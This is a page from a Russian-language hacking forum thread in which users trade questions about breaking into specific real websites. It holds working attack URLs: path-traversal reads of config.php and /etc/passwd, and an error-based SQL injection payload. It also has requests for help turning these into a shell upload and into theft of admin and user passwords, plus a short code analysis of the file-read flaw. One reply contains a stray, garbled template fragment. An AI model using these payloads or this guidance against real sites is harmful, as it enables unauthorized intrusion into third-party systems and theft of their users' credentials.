HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1779 из 2438 « Первая < 7791279167917291769 1775 1776 1777 1778 1779 1780 1781 1782 1783 1789182918792279 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17781  
Старый 02.08.2011, 17:37
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию
Цитата:
Сообщение от =Zeus=  
Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.
Странно, я почему-то думал, что Magic Quotes можно обойти.
Можно обойти, но INTO DUMPFILE требует именно кавычек и чистый путь без хекса и CHAR().
 
Ответить с цитированием

  #17782  
Старый 02.08.2011, 19:24
KUKLOVOD2
Познающий
Регистрация: 12.05.2011
Сообщений: 88
С нами: 7896566

Репутация: 1
По умолчанию
Есть вопросец.Имеется вот такой вот инклуд:

Код:
http://atlanticacorp.com/pages/admin/img_stats.php?file=../../../inf/config.php
.Но вывод идет только одной строки ( а именно 3).Можно ли выжать что то большее?
 
Ответить с цитированием

  #17783  
Старый 02.08.2011, 23:37
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами: 9567396

Репутация: 23
По умолчанию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//if($_SESSION['user_admin']>=$adminRights['stats']) {

[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]])) {

if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./cache/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./cache/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$imgTyp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$imgTitel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$imgValues[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$imgStrings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$inWerte[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$imgValues[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$inStrings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$imgStrings[/COLOR][COLOR="#007700"]);

 }

}[/COLOR][/COLOR
Здесь не инклуд, а локальное урезанное чтение файлов.

В коде жесткое ограничение, что значения берутся только с 3 строчки. Странно, что проверка на админа закомментирована.
 
Ответить с цитированием

  #17784  
Старый 02.08.2011, 23:53
KUKLOVOD2
Познающий
Регистрация: 12.05.2011
Сообщений: 88
С нами: 7896566

Репутация: 1
По умолчанию
ДАДАДА.Меня тоже удивила, как будто специально багу мастерили в двиге.Тоесть ничего не сделать?А вот нашел сайтец на похожем движке:

Код:
http://cwerymt2.ru/index.php?s=../../../../../../../../etc/passwd%00
Двиг аналогичный, но инклуд пашет (просто видно на том сайте нуль байт не пахал).Чисто дальнейшее развитие событий какое может быть?Как происходит залив шелла через локальный инклуд, если неизвестны пути до access.log ?
 
Ответить с цитированием

  #17785  
Старый 03.08.2011, 00:22
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Это не инклуд а читалка. Совсем разные понятия.

Всё, что ты можешь сделать с помощью этой уязвимости - читать 3-ую строчку из файлов.
 
Ответить с цитированием

  #17786  
Старый 03.08.2011, 12:05
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию
Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))

Вот SQL-инъекции

http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1
 
Ответить с цитированием

  #17787  
Старый 03.08.2011, 13:02
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию
Цитата:
Сообщение от aydin-ka  
Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))
Вот SQL-инъекции
http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1
/thread43966.html
 
Ответить с цитированием

  #17788  
Старый 03.08.2011, 13:45
FoXuk
Познающий
Регистрация: 23.12.2009
Сообщений: 70
С нами: 8623701

Репутация: 10
По умолчанию
при входе в админку выдает

Цитата:
Сообщение от None  
Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?
 
Ответить с цитированием

  #17789  
Старый 03.08.2011, 14:00
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию
Цитата:
Сообщение от FoXuk  
при входе в админку выдает
Цитата:
Сообщение от None  
Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?
" if author else f"
Цитата:
FoXuk said:
при входе в админку выдает
Цитата:
Сообщение от None  
Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?
Фатальная ошибка: Класс 'COM' не найден в /www/htdocs/site/custom.php на строке 5
 
Ответить с цитированием

  #17790  
Старый 03.08.2011, 18:52
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию
как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite

попробовал такую чушь inurl:index.php?test= intextowered by coolsite

не канает

подскажите
 
Ответить с цитированием
Ответ
Страница 1779 из 2438 « Первая < 7791279167917291769 1775 1776 1777 1778 1779 1780 1781 1782 1783 1789182918792279 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.